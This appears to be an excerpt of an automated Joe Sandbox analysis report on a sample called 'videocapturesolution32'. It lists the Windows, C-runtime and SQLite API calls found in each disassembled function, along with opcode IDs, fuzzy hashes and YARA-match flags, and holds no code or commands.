                                                          • Opcode Fuzzy Hash: 5f9a839cea70d13b65b17977853b30e2301e9ab85e15ba0dbeb28319094f0e4f
                                                          • Instruction Fuzzy Hash: EB812675D0424ACECF06DFA8D0A0AEEBBB5EF08310F24815AD852B7340EA765A05CF70
                                                          APIs
                                                          • DeleteFileA.KERNEL32(5193289A,?,?,?), ref: 02E430F3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DEA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DEA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2dea000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                          • Instruction ID: 329c1cadd9a5e846995893bbc4bdd10528f9e00ff0a7cb26795365714ef7604b
                                                          • Opcode Fuzzy Hash: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                          • Instruction Fuzzy Hash: 90518CF260C200AFE705AF19DC8577ABBE5EFC8720F16892DE6C583644DA359851CB93
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE9C5
                                                            • Part of subcall function 02DB1A01: TlsGetValue.KERNEL32 ref: 02DB1A0A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologValue
                                                          • String ID:
                                                          • API String ID: 3700342317-0
                                                          • Opcode ID: 1ba89f99200edc4089375c7f503be3c932cad7e39458aa53248e7242f1ae8b58
                                                          • Instruction ID: 5e1def9bde5c21bb63781e50ade26930678913e7f9d9abfe0c5e518c7823016e
                                                          • Opcode Fuzzy Hash: 1ba89f99200edc4089375c7f503be3c932cad7e39458aa53248e7242f1ae8b58
                                                          • Instruction Fuzzy Hash: AA212AB2904209EBDB01DFA4D850AEEBBF9FF49310F14412AE905A3340D774AE04CBA1
                                                          APIs
                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02DB33CC
                                                            • Part of subcall function 02DB32AB: __EH_prolog.LIBCMT ref: 02DB32B0
                                                            • Part of subcall function 02DB32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02DB32C3
                                                            • Part of subcall function 02DB32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB32EF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                          • String ID:
                                                          • API String ID: 1518410164-0
                                                          • Opcode ID: 84cb971155be98e5a4d70586feb0783f96b06319cd4d8fa55d8e03d1854a7f72
                                                          • Instruction ID: 82dcb644a860d744cc94f57f2af1bcb4b87f6240db16bbddbaafce1df195a311
                                                          • Opcode Fuzzy Hash: 84cb971155be98e5a4d70586feb0783f96b06319cd4d8fa55d8e03d1854a7f72
                                                          • Instruction Fuzzy Hash: 36016171614606EFD7059F59D895F95B7A9FF44320F508359E829873C0EB30EC11CBA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE555
                                                            • Part of subcall function 02DB26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02DB2706
                                                            • Part of subcall function 02DB26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02DB272B
                                                            • Part of subcall function 02DB26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DD5B53), ref: 02DB2738
                                                            • Part of subcall function 02DB26DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02DB2778
                                                            • Part of subcall function 02DB26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB27D9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                          • String ID:
                                                          • API String ID: 4293676635-0
                                                          • Opcode ID: 7f5a2116da2096657be4c27394fa532539a9c347852fe77e0bf7cdb5b80cc4cf
                                                          • Instruction ID: ef40b3e9057608a81211704d3a22079659d64defebe63064b39585cb3d9c84ca
                                                          • Opcode Fuzzy Hash: 7f5a2116da2096657be4c27394fa532539a9c347852fe77e0bf7cdb5b80cc4cf
                                                          • Instruction Fuzzy Hash: 5801D0B5900B049FC718CF1AC540986FBF5EF88300B05C5AE944A8B721E770EA40CFA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE334
                                                            • Part of subcall function 02DC3B4C: _malloc.LIBCMT ref: 02DC3B64
                                                            • Part of subcall function 02DBE550: __EH_prolog.LIBCMT ref: 02DBE555
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog$_malloc
                                                          • String ID:
                                                          • API String ID: 4254904621-0
                                                          • Opcode ID: b8c7bd9f2e950fe0d17794ce958ffef66634341d907d5bdfe6161b2e407ee468
                                                          • Instruction ID: 468fdfa08ff2ee0b0f4ff081c8af8779beddeea9eae68bef2893963621581c2f
                                                          • Opcode Fuzzy Hash: b8c7bd9f2e950fe0d17794ce958ffef66634341d907d5bdfe6161b2e407ee468
                                                          • Instruction Fuzzy Hash: A9E08671A00505ABCB09AF58D8107AE77A6DF04700F00456D740AD3340EB709D008AA4
                                                          APIs
                                                            • Part of subcall function 02DC5C5A: __getptd_noexit.LIBCMT ref: 02DC5C5B
                                                            • Part of subcall function 02DC5C5A: __amsg_exit.LIBCMT ref: 02DC5C68
                                                            • Part of subcall function 02DC3493: __getptd_noexit.LIBCMT ref: 02DC3497
                                                            • Part of subcall function 02DC3493: __freeptd.LIBCMT ref: 02DC34B1
                                                            • Part of subcall function 02DC3493: RtlExitUserThread.NTDLL(?,00000000,?,02DC3473,00000000), ref: 02DC34BA
                                                          • __XcptFilter.LIBCMT ref: 02DC347F
                                                            • Part of subcall function 02DC8D94: __getptd_noexit.LIBCMT ref: 02DC8D98
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                          • String ID:
                                                          • API String ID: 1405322794-0
                                                          • Opcode ID: 37dfe9e612bbd625d7132b6e976c7930712f80bb019458fc9087008cfed51e37
                                                          • Instruction ID: ed2cc37d7ff19bb4f5644855c3b8810c622df41fe0fd11582c675087628526cc
                                                          • Opcode Fuzzy Hash: 37dfe9e612bbd625d7132b6e976c7930712f80bb019458fc9087008cfed51e37
                                                          • Instruction Fuzzy Hash: 9DE0ECB19046029FEB09BBA0E949F6E7767EF44301F70008CE102AB361CA74AD41AF30
                                                          APIs
                                                          • RegSetValueExA.KERNEL32(?), ref: 0040D5F5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 9099fa02c714f848bbd02d8072e4723285eb0236fc9be135f6ccd2cd2f171e83
                                                          • Instruction ID: 5777e9539fe7069c3c3a6606f161a0f0b533806c357fc7b885ede7ae2e2cfc6c
                                                          • Opcode Fuzzy Hash: 9099fa02c714f848bbd02d8072e4723285eb0236fc9be135f6ccd2cd2f171e83
                                                          • Instruction Fuzzy Hash: 39C00230C04404E7CB091FD0AE444A97B31BB54304F2084B9E9A6704F08B364969AB1E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 0e711bc704396c0b22cd05a196d8437d68572cdcd1f13eed0043d5cc099e1119
                                                          • Instruction ID: 218edabd8dd696d45a8087cbd9c597a54f2c317aa48327a7766065f47fb863df
                                                          • Opcode Fuzzy Hash: 0e711bc704396c0b22cd05a196d8437d68572cdcd1f13eed0043d5cc099e1119
                                                          • Instruction Fuzzy Hash: CDC09B20E0C007DDD71449F54F4C57577746A14358B210D37E403F25C0E73C950D592D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 29ba3a24e4bec890e753a7e4b9f623943654ea44f34b8217b2794e1bc4aaeab9
                                                          • Instruction ID: 52fa0f959105af55ac4d5712e2ceda46e6c0f256708e39339f28e0edb6fe17aa
                                                          • Opcode Fuzzy Hash: 29ba3a24e4bec890e753a7e4b9f623943654ea44f34b8217b2794e1bc4aaeab9
                                                          • Instruction Fuzzy Hash: A2B09260C08001EAC7404FD08B4502C756299543153B4893B8603F11E4C638490EB62F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: c1cdeaeea4258c792efe5fb026864d9e74fcae00eaac9439e4980c2efc13ff1d
                                                          • Instruction ID: 6e63e1bcfa3e42d27c1ddca8b2e33582374af5a0543867d43b90929a9494dd74
                                                          • Opcode Fuzzy Hash: c1cdeaeea4258c792efe5fb026864d9e74fcae00eaac9439e4980c2efc13ff1d
                                                          • Instruction Fuzzy Hash: E2B01234D00211CFC700CF78D9C47293BF4FF093407000639D446E2200DB7080068B15
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 660264d4f70c642cec2e7b839f50c3e9f1ad5c2d22ffca2aae86f62cd180f5b2
                                                          • Instruction ID: bc8702a845ed1fe3c455ad60fb255715fd4333b6e8192e99da2cd5c37d3eef04
                                                          • Opcode Fuzzy Hash: 660264d4f70c642cec2e7b839f50c3e9f1ad5c2d22ffca2aae86f62cd180f5b2
                                                          • Instruction Fuzzy Hash: 61B01230C4C800D6D60417D04B08A18363066043007204073D302300F086FC6405E70F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: e57120d4a8d75c437ab6a4ec000401b33331d948b9baa6d59df9b8b998786019
                                                          • Instruction ID: 4b000064e1fe7eacd01680484530f0e83b34f3028c438890a2895f855ec7d3b0
                                                          • Opcode Fuzzy Hash: e57120d4a8d75c437ab6a4ec000401b33331d948b9baa6d59df9b8b998786019
                                                          • Instruction Fuzzy Hash: 92A00230654101DAE3401FA55B8CA153769A9257C1B168ABEA567F44E0DB78C049752E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: 7dcec1a5f7b1a1abe3508412536c0f02cfc6921fb8e3fffcf0012a57333c1dc4
                                                          • Instruction ID: ad01798f9e439726e5dadaa5d296f4c640db8efc6943695f74ce3d6038b66cc9
                                                          • Opcode Fuzzy Hash: 7dcec1a5f7b1a1abe3508412536c0f02cfc6921fb8e3fffcf0012a57333c1dc4
                                                          • Instruction Fuzzy Hash: 3D900231148101D6D10016605B0D615253466147C176181376542B00D149FC0505961E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 632515574f825f0fdc9dbf0e085098318565766e106f116b39747b4eb083fb8c
                                                          • Instruction ID: f1e8beb209ee07b2e5c7eac6325fb81dce942d9a1ed2a83f29e597e12d1c2f24
                                                          • Opcode Fuzzy Hash: 632515574f825f0fdc9dbf0e085098318565766e106f116b39747b4eb083fb8c
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                            • Part of subcall function 02DC1610: OpenEventA.KERNEL32(00100002,00000000,00000000,2A7C0CD2), ref: 02DC16B0
                                                            • Part of subcall function 02DC1610: CloseHandle.KERNEL32(00000000), ref: 02DC16C5
                                                            • Part of subcall function 02DC1610: ResetEvent.KERNEL32(00000000,2A7C0CD2), ref: 02DC16CF
                                                            • Part of subcall function 02DC1610: CloseHandle.KERNEL32(00000000,2A7C0CD2), ref: 02DC1704
                                                          • TlsSetValue.KERNEL32(0000002A,?), ref: 02DC21AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$OpenResetValue
                                                          • String ID:
                                                          • API String ID: 1556185888-0
                                                          • Opcode ID: daf45af46142c4b5c2d90be78f1a6316efb202bb717ca7880ca401da6622a276
                                                          • Instruction ID: 0a777796e1da149cf6fe480c4c72639cae8926c57d064c5ae190b72faa3f2ef8
                                                          • Opcode Fuzzy Hash: daf45af46142c4b5c2d90be78f1a6316efb202bb717ca7880ca401da6622a276
                                                          • Instruction Fuzzy Hash: 0F018F71A44614AFD700DF59DC05B6ABBA8EB05661F204B6AF825D3380D731AD148AA0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000), ref: 0040282F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 01f54d9328a05272e63064dbb5b49af2a2ed6932e4d2a174a73570825e3b3f31
                                                          • Instruction ID: ea9a56ab6284ba84832df852bcd7f3009bc77562dd5ea332e7782f9745e7c436
                                                          • Opcode Fuzzy Hash: 01f54d9328a05272e63064dbb5b49af2a2ed6932e4d2a174a73570825e3b3f31
                                                          • Instruction Fuzzy Hash: A6C08071C04136EFD3101F914D44B3AB7E49704705F110036A906B71C0C5791C1AA7ED
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 4a2e18cc123eb16d3587cf7227ac582d5eab6588c0e7def217d9d443f250490d
                                                          • Instruction ID: e0c428883a2a12bdb93c99ada1d3ad200100a4f8308c712f72c263f0bd5242a8
                                                          • Opcode Fuzzy Hash: 4a2e18cc123eb16d3587cf7227ac582d5eab6588c0e7def217d9d443f250490d
                                                          • Instruction Fuzzy Hash: ACB01231D8C701D6C60407E06F0CB6079207301300F204077AB8B700E0C73A044E7A0F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID:
                                                          • API String ID: 1586166983-0
                                                          • Opcode ID: 5d8c512e8c19c32e2b6bcdcf3147c5e97626fc142be2b5fdb1928d9357119c32
                                                          • Instruction ID: 0c5d6521be4535ac0616f5b86e1e40f398a1ae352c1e0fc6d394022d828364cf
                                                          • Opcode Fuzzy Hash: 5d8c512e8c19c32e2b6bcdcf3147c5e97626fc142be2b5fdb1928d9357119c32
                                                          • Instruction Fuzzy Hash: 52900220648101DEF2000B725E0821529986604641312483D6443E0150DA78C0099529
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_step.SQLITE3 ref: 6096755A
                                                          • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                          • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                          • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                          • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                          • sqlite3_step.SQLITE3 ref: 609679C3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                          • sqlite3_step.SQLITE3 ref: 60967AB4
                                                          • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                          • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                          • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                          • sqlite3_step.SQLITE3 ref: 60967B94
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                          • sqlite3_step.SQLITE3 ref: 60967C7D
                                                          • memcmp.MSVCRT ref: 60967D4C
                                                          • sqlite3_free.SQLITE3 ref: 60967D69
                                                          • sqlite3_free.SQLITE3 ref: 60967D74
                                                          • sqlite3_free.SQLITE3 ref: 60967FF7
                                                          • sqlite3_free.SQLITE3 ref: 60968002
                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                          • sqlite3_reset.SQLITE3 ref: 60967C93
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                          • sqlite3_reset.SQLITE3 ref: 60968035
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                          • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                          • sqlite3_step.SQLITE3 ref: 609680D1
                                                          • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                          • sqlite3_reset.SQLITE3 ref: 60968104
                                                          • sqlite3_step.SQLITE3 ref: 60968139
                                                          • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                          • sqlite3_reset.SQLITE3 ref: 6096818A
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                            • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                          • sqlite3_reset.SQLITE3 ref: 609679E9
                                                            • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                            • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                            • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                          • sqlite3_reset.SQLITE3 ref: 609675B7
                                                          • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                          • sqlite3_step.SQLITE3 ref: 6096764C
                                                          • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                          • sqlite3_reset.SQLITE3 ref: 6096768B
                                                          • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                          • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                          • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                          • sqlite3_step.SQLITE3 ref: 609690E6
                                                          • sqlite3_reset.SQLITE3 ref: 609690F1
                                                          • sqlite3_free.SQLITE3 ref: 60969102
                                                          • sqlite3_free.SQLITE3 ref: 6096910D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID: $d
                                                          • API String ID: 2451604321-2084297493
                                                          • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                          • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                          • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                          • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                          • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                          • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                          • sqlite3_step.SQLITE3 ref: 6096A969
                                                          • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                          • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                          • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                          • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                          • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                          • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                          • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                          • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                          • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                          • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
